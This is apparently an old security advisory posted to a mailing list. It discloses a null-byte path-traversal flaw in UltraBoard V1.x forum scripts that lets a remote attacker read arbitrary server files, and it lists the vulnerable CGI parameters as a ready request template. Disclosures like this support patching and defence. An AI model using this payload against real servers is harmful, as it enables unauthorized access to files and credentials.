Using the good old NullByte(\000) its possible to open "any" file on the webserver(with its permissions) running the "UltraBoard" forum-software.
cac53c20c8f003f1c433d4901d938d89d764d76df657e71ce2c13537f325a103
hola friends,
found some interesting things in the "old" UltraBoard-Forum scripts
(UltraBoard V 1.6)
class:Input Validation Error
remote:Yes
vulnerable:UltraBoard V1.*
vendor: www.ultrascripts.com || www.ub2k.com
Description:
By using the good old NullByte(\000) its possible to open "any" file on the
webserver(with its permissions) running the "UltraBoard" forum-software.
cgi-script:
UltraBoard.pl || UltraBoard.cgi
Variables:
Action=PrintableTopic
Post=[path_including_".."_to_any_file][***NULLBYTE***]
Board=[valid_board]
Idle=10
Sort=0
Order=Descend
Page=0
Session=
hmm ... EOF
nizedays,
rudic
rudicarell@hotmail.com
<dream>"getrootallthetime"</dream>
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com